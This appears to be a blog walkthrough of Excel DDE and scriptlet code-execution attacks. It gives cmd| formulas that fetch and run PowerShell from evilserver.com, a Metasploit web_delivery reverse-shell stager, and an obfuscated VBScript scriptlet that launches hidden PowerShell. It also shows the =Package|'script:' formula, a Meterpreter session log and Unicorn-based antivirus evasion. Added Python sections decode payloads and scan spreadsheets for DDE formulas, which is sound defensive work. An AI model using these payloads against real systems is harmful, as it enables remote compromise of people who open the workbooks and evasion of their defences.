Excel Scriptlets Attack

What does not destroy me makes me stronger.

0x00 Basics

DDE can execute arbitrary commands from an Excel worksheet formula, but it has two drawbacks, both of which need user interaction:
1. On first open, Excel prompts the user to "Enable Content".
2. On every later open, it prompts again to "Update" the linked content.

DDE is an inter-process communication mechanism. To keep linked data current, it allows Excel to launch and talk to other applications, and can even pull live data back from a web request.

The executable name and its arguments are also length-limited, so PowerShell.exe may not be launchable from DDE directly; the workaround is to launch cmd.exe and pass PowerShell.exe as its argument. That spends extra bytes out of an argument budget that is already capped at 1024 bytes. (This cap is not the CreateProcess() limit itself: CreateProcess() accepts command lines of up to 32,767 characters.)

=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://evilserver.com/sp.base64\");powershell -e $e'!A1

The same, fetching the plaintext script instead of a base64 blob:
=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://evilserver.com/sp.ps1\");IEX $e'!A1

Using a .bat file (cmd.exe runs the batch file straight from the UNC path; no PowerShell is involved at this stage, so no IEX is needed):
=cmd|'/c \\evilserver.com\sp.bat'!A1

Of course, beyond the reverse shell demonstrated below there is a lot more you can do, for example using Excel to escalate privileges directly with a modified MS16-032 script:
https://gist.githubusercontent.com/ssherei/41eab0f2c038ce8b355acf80e9ebb980/raw/0a3b7af41ac8c9a975cfeff2ab21c7eb5e6857a1/Modified-MS16-032.ps1


0x01 Generating the PowerShell script with MSF

Original article: https://www.lastline.com/labsblog/when-scriptlets-attack-excels-alternative-to-dde-code-execution/

use exploit/multi/script/web_delivery
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.2
set lport 22222
set srvhost 10.10.10.2
set target 2
set ssl true
run -j
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN');

0x02 Encoding the command

Note:
PowerShell's -EncodedCommand expects base64 of the script's UTF-16LE bytes. Base64 of the UTF-8 bytes decodes to garbage and the command fails.

utf8 ————>>> base64   fails
utf16-le ——>>> base64   works

bash
Note the quoting: the web_delivery payload above uses single quotes around the URL, but the one-liner below wraps the whole script in single quotes for the shell, so I changed the URL's quotes to double quotes.

# echo '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring("https://10.10.10.2:8080/QpxuaN")' | iconv --to-code UTF-16LE | base64 -w0
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
(base64 -w0 turns off GNU base64's default 76-column line wrapping, which would otherwise break the blob when pasted into -EncodedCommand. echo also appends a newline that ends up inside the encoded script; PowerShell treats it as whitespace, so it is harmless.)

Or save the script to payload.txt first (one statement per line is fine):
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
$l=new-object net.webclient;
$l.proxy=[Net.WebRequest]::GetSystemWebProxy();
$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')
# cat payload.txt | iconv --to-code UTF-16LE | base64 -w0
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

python

import base64

command = ("[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};"
           "$l=new-object net.webclient;"
           "$l.proxy=[Net.WebRequest]::GetSystemWebProxy();"
           "$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
           "IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')")
# -EncodedCommand wants the UTF-16LE bytes; b64encode() is the bytes-in, bytes-out
# call (base64.encode() works on file objects and is not what is needed here)
encoded = base64.b64encode(command.encode('utf-16-le')).decode('ascii')
print(encoded)
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

powershell [1]

Windows PowerShell serializes a script block passed as an argument to a native executable as "-encodedCommand <base64 of the UTF-16LE text>". Echoing it back through cmd.exe and splitting on the space therefore yields the encoded blob without calling the encoder yourself:

PS> (cmd /c echo {[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')}).Split(' ')[1]
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

powershell [2]

Mind the quoting: the script contains $true and $l, which a double-quoted PowerShell string would interpolate ({$true} becomes {True} and $l becomes empty), silently corrupting the payload. A single-quoted here-string leaves it untouched:

PS> $command = @'
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')
'@
PS> $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)   # .NET "Unicode" is UTF-16LE
PS> $encoded = [Convert]::ToBase64String($bytes)
PS> $encoded
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

Other encoders and obfuscators:
https://github.com/danielbohannon/Invoke-Obfuscation
https://04z.net/2017/12/12/Powershell-Evasion/
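The encoding requirement above is easy to get wrong in both directions: an attacker who base64s UTF-8 gets a launcher that silently fails, and an analyst who decodes a captured -EncodedCommand as UTF-8 sees mojibake. The Python below is an added example (my code, not from the original post or the Lastline article) that encodes the way powershell.exe expects, decodes the way it will, and flags the UTF-8 mistake; the stager URL in SAMPLE_COMMAND is a made-up placeholder.

```python
import base64

# Constructed stand-in for the web_delivery one-liner above; the URL is an
# assumption for this example, not the page's 10.10.10.2 listener.
SAMPLE_COMMAND = ("IEX (New-Object Net.WebClient)"
                  ".DownloadString('https://stager.example.invalid/QpxuaN')")


def encode_command(command: str, encoding: str = "utf-16-le") -> str:
    """Base64 a script for `powershell -EncodedCommand`.

    powershell.exe decodes the blob as UTF-16LE, so the default is the only
    encoding that round-trips; encoding="utf-8" reproduces the failing case
    described above (a valid-looking blob that PowerShell cannot parse)."""
    return base64.b64encode(command.encode(encoding)).decode("ascii")


def decode_command(blob: str) -> str:
    """Decode a blob the way powershell.exe will: as UTF-16LE, regardless of
    what the producer intended. Handy for -EncodedCommand values lifted from
    process-creation (4688) or script-block (4104) logs."""
    raw = base64.b64decode(blob)
    if len(raw) % 2:          # an odd byte count can never be valid UTF-16
        raw += b"\x00"
    return raw.decode("utf-16-le", errors="replace")


def looks_misencoded(blob: str) -> bool:
    """Heuristic for the UTF-8 mistake: ASCII bytes paired up as UTF-16LE land
    in the CJK range, so almost no printable ASCII survives decoding."""
    text = decode_command(blob)
    printable = sum(1 for c in text if 0x20 <= ord(c) < 0x7F)
    return printable < len(text) // 2


if __name__ == "__main__":
    good = encode_command(SAMPLE_COMMAND)
    bad = encode_command(SAMPLE_COMMAND, "utf-8")
    print("utf-16-le:", good, "->", decode_command(good))
    print("utf-8    :", bad, "->", repr(decode_command(bad)),
          "misencoded:", looks_misencoded(bad))
```

encode_command("dir") gives ZABpAHIA, the UTF-8 variant gives ZGly; decoding the latter as UTF-16LE yields no readable ASCII, which is what looks_misencoded keys on.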

0x03 Save the script into an XML scriptlet file (x.xml)

<?XML version="1.0"?>
<scriptlet>
<registration
    description="KH9uSJNGgLpeK"
    progid="aLqKTT.ba9f0i"
    version="1.0"
    classid="{D77A5972-210E-4FD6-BC1E-6094A40A1025}" remotable="true">
</registration>
<script language="VBScript">
<![CDATA[
' Run the launcher unless another script host is already executing this file
if not vLQ then
    dim tZnIOJNSxlFdPBXvNMkpDqNa
    DiM xZdwuEqRiLPWuENFURdUOisq
    ' CreateObject("WScript.Shell"): the class name is assembled from Chr/ChrW calls
    ' (StrReverse on a single character is a no-op, pure obfuscation)
    Set tZnIOJNSxlFdPBXvNMkpDqNa = creaTEobjEcT(StrReverse(ChrW(&H57)) & ChrW(&H53) & Chr(&H63) & ChrW(&H72) & Chr(&H69) & StrReverse(Chr(&H70)) & ChrW(&H54) & StrReverse(Chr(&H2E)) & StrReverse(Chr(&H53)) & Chr(&H48) & StrReverse(ChrW(&H65)) & ChrW(&H6C) & ChrW(&H4C))
    ' The PowerShell launcher; -Ec takes the UTF-16LE base64 blob from 0x02
    xZdwuEqRiLPWuENFURdUOisq = " poWERSHelL.EXe -ex ByPAss -noP -W Hidden -Ec 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 "
    ' Run "%ComSpec%" /C <launcher> with window style 0 (hidden); %ComSpec% is obfuscated the same way
    tZnIOJNSxlFdPBXvNMkpDqNa.rUn ChR(34)&tZnIOJNSxlFdPBXvNMkpDqNa.eXPaNDEnVIROnMENtStrinGs(StrReverse(ChrW(&H25)) & ChrW(&H43) & StrReverse(ChrW(&H4F)) & Chr(&H6D) & StrReverse(Chr(&H53)) & Chr(&H70) & StrReverse(ChrW(&H65)) & Chr(&H43) & StrReverse(ChrW(&H25)))&cHR(34)&CHR(34)&ChrW(&H2F) & StrReverse(Chr(&H43)) & Chr(&H20)&xZdwuEqRiLPWuENFURdUOisq&CHR(34),0
    set tZnIOJNSxlFdPBXvNMkpDqNa = noThIng
end if

' Counts cscript/wscript processes whose command line names this script, so the
' launcher only fires once. WScript.ScriptName exists only under those hosts and is
' only evaluated inside the loop, i.e. when such a process is actually found.
Function vLQ
    Dim vFVw
    Dim vdbGCrvsiz
    Dim vUC
    Set vFVw = GetObject("winmgmts:\\.\root\cimv2").ExecQuery(_
        "Select * from Win32_Process where Name='cscript.exe' or Name='wscript.exe'",,48)
    For Each vdbGCrvsiz in vFVw
        If Instr(1,vdbGCrvsiz.CommandLine, WScript.ScriptName,1)> 0 Then
            vUC = vUC + 1
        End If
    Next
    vLQ = (vUC > 1)
End Function
]]>
</script>
</scriptlet>
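On the receiving side, the first question about a file like x.xml is what it actually runs. The Python below is an added example (my code, not part of the original post) that parses the scriptlet's registration block, evaluates the Chr/ChrW/StrReverse string building the VBScript uses, and decodes the -Ec blob. The embedded SAMPLE_SCT is a constructed copy of the scriptlet above with a short known payload ("dir") in place of the stager so that it runs offline.

```python
import base64
import re

# Constructed scriptlet modelled on the x.xml above: same registration block and
# the same Chr/ChrW/StrReverse string building, but with a short known payload
# ("dir", UTF-16LE base64 "ZABpAHIA") in place of the stager blob.
SAMPLE_SCT = r'''<?XML version="1.0"?>
<scriptlet>
<registration description="KH9uSJNGgLpeK" progid="aLqKTT.ba9f0i" version="1.0"
 classid="{D77A5972-210E-4FD6-BC1E-6094A40A1025}" remotable="true">
</registration>
<script language="VBScript">
<![CDATA[
Set sh = creaTEobjEcT(StrReverse(ChrW(&H57)) & ChrW(&H53) & Chr(&H63) & ChrW(&H72) & Chr(&H69) & StrReverse(Chr(&H70)) & ChrW(&H54) & StrReverse(Chr(&H2E)) & StrReverse(Chr(&H53)) & Chr(&H48) & StrReverse(ChrW(&H65)) & ChrW(&H6C) & ChrW(&H4C))
cmd = " poWERSHelL.EXe -ex ByPAss -noP -W Hidden -Ec ZABpAHIA "
sh.rUn ChR(34)&sh.eXPaNDEnVIROnMENtStrinGs(StrReverse(ChrW(&H25)) & ChrW(&H43) & StrReverse(ChrW(&H4F)) & Chr(&H6D) & StrReverse(Chr(&H53)) & Chr(&H70) & StrReverse(ChrW(&H65)) & Chr(&H43) & StrReverse(ChrW(&H25)))&cHR(34)&CHR(34)&ChrW(&H2F) & StrReverse(Chr(&H43)) & Chr(&H20)&cmd&CHR(34),0
]]>
</script>
</scriptlet>'''

# One obfuscated character: Chr(n)/ChrW(n), optionally wrapped in StrReverse()
# (a no-op on a single character, which is why it can be ignored when decoding).
_CHR = r'Chr(?:W)?\(\s*(?:&H[0-9A-Fa-f]+|\d+)\s*\)'
_TERM = rf'(?:StrReverse\(\s*{_CHR}\s*\)|{_CHR})'
CHAIN_RE = re.compile(rf'{_TERM}(?:\s*&\s*{_TERM})*', re.IGNORECASE)
CHR_RE = re.compile(r'Chr(?:W)?\(\s*(&H[0-9A-Fa-f]+|\d+)\s*\)', re.IGNORECASE)
# -e / -ec / -enc / -encodedcommand followed by the blob; -ex (ExecutionPolicy) must not match
ENC_RE = re.compile(r'(?<![\w-])-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)


def decode_chain(chain: str) -> str:
    """Evaluate a '&'-joined chain of Chr/ChrW terms back to the string it builds."""
    out = []
    for m in CHR_RE.finditer(chain):
        value = m.group(1)
        out.append(chr(int(value[2:], 16) if value[:2].upper() == '&H' else int(value)))
    return ''.join(out)


def analyze_scriptlet(sct: str) -> dict:
    """Pull the COM registration, the deobfuscated strings and the PowerShell
    -EncodedCommand payload out of a scriptlet (.sct / x.xml) file."""
    reg = re.search(r'<registration\b([^>]*)>', sct, re.IGNORECASE)
    attrs = dict(re.findall(r'(\w+)\s*=\s*"([^"]*)"', reg.group(1))) if reg else {}
    body = re.search(r'<script\b[^>]*>\s*(?:<!\[CDATA\[)?(.*?)(?:\]\]>)?\s*</script>',
                     sct, re.IGNORECASE | re.DOTALL)
    script = body.group(1) if body else ''
    strings = [decode_chain(m.group(0)) for m in CHAIN_RE.finditer(script)]
    enc = ENC_RE.search(script)
    command = None
    if enc:
        # powershell.exe decodes -EncodedCommand as UTF-16LE (see 0x02)
        command = base64.b64decode(enc.group(1)).decode('utf-16-le', errors='replace')
    return {
        'progid': attrs.get('progid'),
        'classid': attrs.get('classid'),
        'remotable': attrs.get('remotable'),
        'decoded_strings': strings,
        'encoded_command': enc.group(1) if enc else None,
        'powershell_command': command,
    }


if __name__ == '__main__':
    for key, value in analyze_scriptlet(SAMPLE_SCT).items():
        print(f'{key:20} {value}')
```

On the sample this recovers "WScripT.SHelL" and "%COmSpeC%" (the case mangling is part of the obfuscation; COM lookups and environment variables are case-insensitive), the quote and "/C " fragments that frame the command line, and the decoded payload. The same CHAIN_RE approach works on the real x.xml above because it uses exactly this Chr/StrReverse pattern.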

0x04 Serve the file over HTTP (python, php, ...)

php -S 0.0.0.0:8081
python -m SimpleHTTPServer 8081    # Python 2
python3 -m http.server 8081        # Python 3
The scriptlet is then reachable at http://10.10.10.2:8081/x.xml

0x05 Create a new Excel workbook, paste the following formula into any cell, and save

=Package|'script:http://10.10.10.2:8081/x.xml'!''''
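A defender looking for this vector in inbound spreadsheets (or CSVs, which Excel also evaluates as formulas when opened directly) wants to recognise both the classic =cmd| DDE form from 0x00 and the =Package|'script:...' form here. The Python below is an added example, not part of the original post; it generalises beyond the page's two formulas by checking all four formula-start characters (=, +, -, @) and classifying the target application. SAMPLE_CSV is constructed sample data.

```python
import csv
import io
import re

# Excel treats a cell starting with any of these as a formula (also when imported
# from CSV), so all four prefixes are checked, not just '='.
FORMULA_PREFIXES = '=+-@'

# DDE link syntax: <app>|<topic>!<item>; the topic may be single-quoted
DDE_RE = re.compile(
    r"^[=+\-@]\s*(?P<app>[A-Za-z][\w.\-]*)\s*\|\s*"
    r"(?P<topic>'(?:[^']|'')*'|[^!']+)\s*!\s*(?P<item>.*)$",
    re.DOTALL,
)

# DDE "applications" that are really command interpreters or script hosts
SHELL_APPS = {'cmd', 'powershell', 'mshta', 'regsvr32', 'rundll32',
              'wscript', 'cscript', 'certutil', 'msiexec'}

# Constructed sample sheet: two of the page's formulas plus benign cells that
# start with formula characters and must not be flagged.
SAMPLE_CSV = r"""Name,Amount,Note
alice,=SUM(B2:B3),"=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\""http://evilserver.com/sp.ps1\"");IEX $e'!A1"
bob,42,"=Package|'script:http://10.10.10.2:8081/x.xml'!''''"
carol,-7,"@SUM(1,2)"
dave,+3,plain text with | and ! in it
"""


def col_name(index: int) -> str:
    """0 -> A, 25 -> Z, 26 -> AA (Excel column lettering)."""
    name = ''
    index += 1
    while index:
        index, rem = divmod(index - 1, 26)
        name = chr(ord('A') + rem) + name
    return name


def classify_dde(cell: str):
    """Return a finding dict if the cell text is a DDE formula, else None."""
    m = DDE_RE.match(cell.strip())
    if not m:
        return None
    app, topic, item = m['app'], m['topic'].strip("'"), m['item']
    base = app.lower()
    if base.endswith('.exe'):
        base = base[:-4]
    if topic.lower().startswith('script:'):
        # The Package|'script:...' trick: the script: moniker fetches and runs a scriptlet
        reason = 'script: moniker loads a remote COM scriptlet'
    elif base in SHELL_APPS:
        reason = f'DDE link spawns {base}'
    else:
        reason = 'DDE link to an external application'
    return {'app': app, 'topic': topic, 'item': item, 'reason': reason}


def scan_cells(cells):
    """cells: iterable of (cell_ref, text). Returns one finding per DDE formula."""
    findings = []
    for ref, text in cells:
        first = (text or '').lstrip()[:1]
        if not first or first not in FORMULA_PREFIXES:
            continue
        hit = classify_dde(text)
        if hit:
            findings.append({'cell': ref, **hit})
    return findings


def scan_csv(text: str):
    """Scan a CSV the way Excel would interpret it when opened directly."""
    cells = []
    for row_no, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        for col_no, value in enumerate(row):
            cells.append((f'{col_name(col_no)}{row_no}', value))
    return scan_cells(cells)


if __name__ == '__main__':
    for f in scan_csv(SAMPLE_CSV):
        print(f"{f['cell']}: {f['reason']} (app={f['app']!r}, topic={f['topic'][:40]!r})")
```

On the sample only C2 (cmd) and C3 (Package with a script: topic) are reported; the negative amounts and the @SUM cell start with formula characters but are not DDE links. For real .xlsx files the same classify_dde() can be run over the text of each <f> element in xl/worksheets/sheet*.xml.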

0x06 Open the workbook

Remember to click "Enable Content" (or "Update" on a later open).

[*] Sending stage (179779 bytes) to 10.10.10.27
[*] Meterpreter session 1 opened (10.10.10.2:22222 -> 10.10.10.27:49956) at 2017-12-19 20:45:30 +0800
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: X\evi1ox

0x07 Bonus

Using Magic Unicorn to bypass AV

>>> kali_linux
git clone https://github.com/trustedsec/unicorn.git
cd unicorn
python unicorn.py --help
python unicorn.py windows/meterpreter/reverse_https cdn-01.example.com 443 macro
sudo msfconsole -r unicorn.rc
>>> windows
Open powershell_attack.txt and run its contents.
The generated PowerShell can of course be planted in Excel the same way, which gets past some WAFs and AV products.

http://staaldraad.github.io/2017/10/23/msword-field-codes/
http://www.exploresecurity.com/from-csv-to-cmd-to-qwerty/
https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/
https://gist.githubusercontent.com/ssherei/41eab0f2c038ce8b355acf80e9ebb980/raw/0a3b7af41ac8c9a975cfeff2ab21c7eb5e6857a1/Modified-MS16-032.ps1

This article is original work; please follow this site's terms when reposting.

Updated: 24 May 2018, 21:05